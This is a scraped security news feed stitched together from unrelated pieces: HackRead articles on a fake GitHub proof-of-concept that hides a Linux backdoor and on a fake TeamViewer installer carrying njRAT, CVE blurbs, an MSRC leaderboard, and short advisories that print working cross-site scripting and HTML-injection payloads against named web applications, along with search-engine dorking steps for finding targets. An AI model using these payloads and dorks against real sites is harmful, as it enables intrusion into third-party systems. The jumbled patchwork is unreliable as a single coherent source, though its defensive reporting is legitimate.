Categories: News
Tags: week

Tags:  security

Tags:  July

Tags:  2023

A list of topics we covered in the week of July 10 to July 16 of 2023



(Read more...)




The post A week in security (July 10 - 16) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows Antivirus

Mac Antivirus

Android Antivirus

Free Antivirus

VPN App (All Devices)

Malwarebytes for iOS

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (July 10 - 16)

By Habiba Rashid
At the time of writing, all reported fake repositories have been taken down and the malicious PoC has been removed from GitHub.
This is a post from HackRead.com Read the original post: Fake GitHub Repos Caught Dropping Malware as PoCs AGAIN!

**The backdoor dropped in the scam had the ability to exfiltrate a wide range of data, including the hostname, username, and a comprehensive list of home directory contents.**

Cybersecurity researchers have uncovered a deceptive trend within the security community—a proof of concept (PoC) repository on **GitHub** that appears to address vulnerabilities but actually contains a hidden backdoor. The discovery by the Uptycs threat research team has raised concerns among the security research community.

PoCs are typically **used by researchers** to identify potential vulnerabilities through harmless testing. However, this malicious PoC operates as a downloader, disguising its activities as a kernel-level process while silently executing a Linux bash script. 

The backdoor has the ability to exfiltrate a wide range of data, including the hostname, username, and a comprehensive list of home directory contents. Moreover, by adding their SSH key to the authorized\_keys file, an attacker can achieve full control over a targeted system.

One of the fake profiles on GitHub that was used in spreading malicious PoCs (Image credit: Uptycs)

Here, Hackread.com can exclusively confirm that the image used in the above GitHub profile belongs to Shahriyar Hamid oghlu Mammadyarov, known internationally as **Shakhriyar Mamedyarov**, who is an Azerbaijani chess grandmaster. The profile image was stolen from a **blog post** and **a YouTube video** published by the popular Chess-related YouTube channel, ChessBase India.

The backdoor was discovered during the testing of PoCs for various Common Vulnerabilities and Exposures (CVEs) when the Uptycs team encountered a PoC claiming to address the critical vulnerability **CVE-2023-35829**. However, they detected several unusual activities that raised suspicions about the PoC’s legitimacy.

The suspicious behaviours encompassed unexpected network connections, abnormal data transfers, and unauthorized attempts to access the system. Further investigation revealed the significance of the “aclocal.m4” file, which required additional analysis.

The primary function of the binary file contains an interesting string, “kworker,” which plays a crucial role in the deception. The code checks if the binary is named “kworker” and performs specific actions accordingly, establishing **backdoor persistence** through file manipulation.

In their **report**, Nischay Hegde and Siddartha Malladi of the Uptycs Threat Research team wrote that the PoC used forking to create a new process, obscuring the original command line parameters. The parent process then executes the “curl\_func()” function, which downloads a URL containing a bash script. The script is executed if the curl request succeeds.

The fake PoC is a copy of a legitimate exploit for another Linux kernel vulnerability, **CVE-2022-34918**. It creates the illusion of being a root shell, exploiting differences in user namespaces to deceive users. However, the granted privileges are limited to the “/bin/bash” shell within a specific namespace.

Fake PocC (left) – Original PoC (right) – (Image credit: Uptycs)

Using Uptycs Extended Detection and Response (XDR), the binary’s behaviour was identified primarily as a downloader. It retrieves a script from a remote source and executes it on the compromised system. The downloaded script accesses the “/etc/passwd” file and modifies the “~/.ssh/authorized\_keys” file to grant unauthorized access and exfiltrates data using a specific URL.

This incident is not isolated; just last month, **it was reported that** several fake accounts on GitHub and Twitter were spreading malware in malicious PoC that infected both Windows- and Linux-based systems.

At the time of writing, ChriSander22’s repositories were taken down. Although the malicious PoC has also been removed from GitHub, it was widely shared, resulting in significant engagement before its true nature was exposed. Those who executed the PoC are at high risk of data compromise.

Therefore, it is crucial to take immediate action, including removing unauthorized SSH keys, deleting the “kworker” file, removing the kworker path from the “bashrc” file, and checking for potential threats in “/tmp/.iCE-unix.pid.”

**Malicious Repositories**

*   https://github.com/apkc/CVE-2023-35829-poc
*   https://github.com/ChriSanders22/CVE-2023-20871-poc/
*   https://github.com/ChriSanders22/CVE-2023-35829-poc/ (**archive link**)

Differentiating between legitimate and malicious PoCs can be challenging and security researchers are encouraged to adopt safe practices, such as conducting testing in isolated environments like virtual machines, to enhance protection against these **evolving cybersecurity risks**.

**RELATED ARTICLES**

1.  Crooks Targeting LinkedIn Users with Fake Profiles
2.  AI-Generated Images Used to Represent a Fake Law Firm
3.  Fake Facebook Profiles, Google Ads Pushing Sys01 Stealer
4.  Fake LinkedIn Job Offer Scam Hacked Off $625M from Axie Infinity
5.  Hackers Setup Fake Cyber Security Firm to Target InfoSec Experts

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Fake GitHub Repos Caught Dropping Malware as PoCs AGAIN!

An out-of-bounds write vulnerability in Bitdefender Engines on Windows causes the engine to crash. This issue affects Bitdefender Engines version 7.94791 and lower.

CVE-2023-3633

By Habiba Rashid
A fake and malicious version of TeamViewer is being pushed as legitimate, which in reality infects devices with njRAT Malware (aka Bladabindi).
This is a post from HackRead.com Read the original post: Fake TeamViewer Installer Used to Deliver njRAT Malware

**The njRAT malware is a remote access trojan that can perform malicious activities such as keylogging, password stealing, data exfiltration, accessing webcams and microphones, and downloading additional files, posing a significant threat to system privacy and security.**

In recent news, cybersecurity researchers have discovered that threat actors are utilizing the popular remote desktop support software, TeamViewer, as a delivery mechanism for the njRAT malware.

The **njRAT, also known as Bladabindi**, is a remote access trojan that poses a significant threat to the privacy, security, and integrity of affected systems.

The recent findings by Cyble Research & Intelligence Labs (CRIL) shed light on the deceptive tactics employed by threat actors to exploit the trust associated with well-known applications. By leveraging the widespread adoption of TeamViewer, as well as other legitimate tools like WireShark and Process Hacker, the threat actors deceive unsuspecting users into downloading and executing the malicious files.

The njRAT malware, **initially discovered in 2012-2013**, has primarily targeted organizations in Middle Eastern nations. This trojan is capable of carrying out a range of malicious activities, including keylogging, password stealing, data exfiltration, accessing webcams and microphones, and downloading additional files.

Upon closer **analysis**, CRIL researchers identified a 32-bit Smart Installer as the delivery mechanism for the njRAT malware. The installer drops two files in the Windows folder, one of which is the njRAT malware itself, while the other is a genuine TeamViewer application. This clever camouflage allows the malware to operate undetected within compromised systems.

Once executed, the installer triggers the **njRAT** malware and simultaneously launches the legitimate TeamViewer application, creating a deceptive user prompt window that requests the user to proceed with the TeamViewer installation. While the user believes they are installing legitimate software, the njRAT quietly conducts its malicious operations within the compromised system.

To ensure persistence, njRAT modifies system settings, including the “SEE\_MASK\_NOZONECHECKS” environment variable in the Windows registry, thereby bypassing security warning prompts. Additionally, it creates autorun entries in the system registry and copies itself to the startup directory, guaranteeing that it automatically runs every time the system boots up.

njRAT files in the Windows folder (Cyble)

The njRAT trojan also engages in keylogging, capturing keystrokes by utilizing a dedicated thread with continuous monitoring and storage of the captured data. It collects various system information and encodes it using the base64 encoding scheme for exfiltration.

The malware establishes a connection with a Command and Control (C&C) server to transmit the gathered information, awaiting instructions from the C&C server for further malicious actions. 

The exploitation of legitimate **software like TeamViewer** highlights the resourcefulness and adaptability of threat actors in spreading malware. Users must take precautionary measures to protect themselves from such attacks.

Recommendations include downloading tools and applications only from official websites, enabling automatic software updates, using reputable antivirus and internet security software, and exercising caution when opening untrusted links or email attachments.

1.  TeamViewer was Targeted by Chinese Hackers in 2016
2.  TeamSpy malware targeting users via malicious TeamViewer app
3.  Hackers targeting embassies with trojanized version of TeamViewer
4.  VirusTotal Reveals Apps Most Exploited by Hackers to Spread Malware

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Fake TeamViewer Installer Used to Deliver njRAT Malware

BloodBank version 1.0 suffers from a cross site scripting vulnerability.

    ======================================================================================================================================| # Title     : BloodBank v1.0 - Blood Donor Directory CMS with PayPal Integration XSS Vulnerability                                 || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                               || # Vendor    : https://codecanyon.net/item/bloodbank-blood-donor-directory-cms-with-paypal-integration/21188267                     |  | # Dork      : n/a                                                                                                                  |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload in search box: <script>alert(/indoushka/);</script>[+]  http://127.0.0.1/demosly.om/xicia/cc/bloodbank/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

BloodBank 1.0 Cross Site Scripting

Blogator version 0.93 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Blogator script v 0.93 XSS Vulnerability                                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.blogator.net/                                                                                           |  | # Dork      : Weblogs par Blogator-script www.blogator-script.com © 2006 SAMTEK - Blogator                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use Payload : ?msg=Ce%2520pseudo%2520de%2520membre%2520est%2520inconnu%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28904707%29%3C/ScRiPt%3E[+] http://127.0.0.1//tst/?msg=Ce%2520pseudo%2520de%2520membre%2520est%2520inconnu%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28904707%29%3C/ScRiPt%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Blogator 0.93 Cross Site Scripting

Bigware Shop version 2.3 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Bigware Shop v2.3 XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.bigware.de/                                                                                             |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Xss /Html inject Use Payload : /main_bigware_39.php?bigPfad=&items_id=67%27%22%28%29%26%25%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E[+] http://target_site/main_bigware_39.php?bigPfad=&items_id=67%27%22%28%29%26%25%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Bigware Shop 2.3 Cross Site Scripting

Bazaar Social Listing Shopping Web PHP Template version 2.3.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Bazaar Social Listing Shopping Web PHP Template v2.3.2 XSS Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : https://codecanyon.net/item/bazaar-social-listing-shopping-web-php-template/23207913?s_rank=87                     |  | # Dork      : "/ad-info.php?adObjID="                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Create New User Account.[+] Edit your account https://127.0.0.1/egyptdrinkscom/settings.php or Sell an item https://127.0.0.1/egyptdrinkscom/sell-edit-stuff.php[+] Put Your Payload xss/hrml .====Greetings to :=====================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |=======================================================================================================================================

Bazaar Social Listing Shopping Web PHP Template 2.3.2 Cross Site Scripting

Improper Input Validation in the hyperlink interpretation in Savoir-faire Linux's Jami (version 20222284) on Windows. 

This allows an attacker to send a custom HTML anchor tag to pass a string value to the Windows QRC Handler through the Jami messenger.



To use PolyGerrit, please enable JavaScript in your browser settings, and then refresh this page.

CVE-2023-3434

Congratulations to all the researchers recognized in this quarter’s Microsoft Researcher Recognition Program leaderboard! Thank you to everyone for your hard work and continued partnership to secure customers.
The top three researchers of the 2023 Q2 Security Researcher Leaderboard are: Yuki Chen, HAO LI, wkai!
Check out the full list of researchers recognized this quarter here.

Congratulations to all the researchers recognized in this quarter’s Microsoft Researcher Recognition Program leaderboard! Thank you to everyone for your hard work and continued partnership to secure customers.

The top three researchers of the 2023 Q2 Security Researcher Leaderboard are: **Yuki Chen, HAO LI, wkai!**

Check out the full list of researchers recognized this quarter here.

Congratulations to the top Azure researchers this quarter: **goodbyeselene, HAO LI, basvdlouw!**

Congratulations to the top Office researchers this quarter: **Anonymous, zcgonvh, Harun Can!**

Congratulations to the top Windows researchers this quarter: **Yuki Chen, wkai, k0shl!**

This 2023 Q2 leaderboard reflects point values for cases that are:

*   Submitted and assessed by the MSRC team between April 1, 2023, and June 30, 2023
    
*   Submitted and assessed by the MSRC team between January 1, 2023, and March 31, 2023 (last program period), but assessed after April 1, 2023
    

Past MSRC Quarterly Leaderboards:

*   2023-04: MSRC 2022 Q1 Security Researcher Leaderboard
    
*   2023-01: MSRC 2022 Q4 Security Researcher Leaderboard
    
*   2022-10: MSRC 2022 Q3 Security Researcher Leaderboard
    
*   2022-07: MSRC 2022 Q2 Security Researcher Leaderboard
    
*   2022-04: MSRC 2022 Q1 Security Researcher Leaderboard
    
*   2022-02: MSRC 2021 Q4 Security Researcher Leaderboard
    
*   2021-10: MSRC 2021 Q3 Security Researcher Leaderboard
    

Keep up the awesome work and we look forward to seeing you next quarter!

_Madeline Eckert, MSRC_

Tag

#windows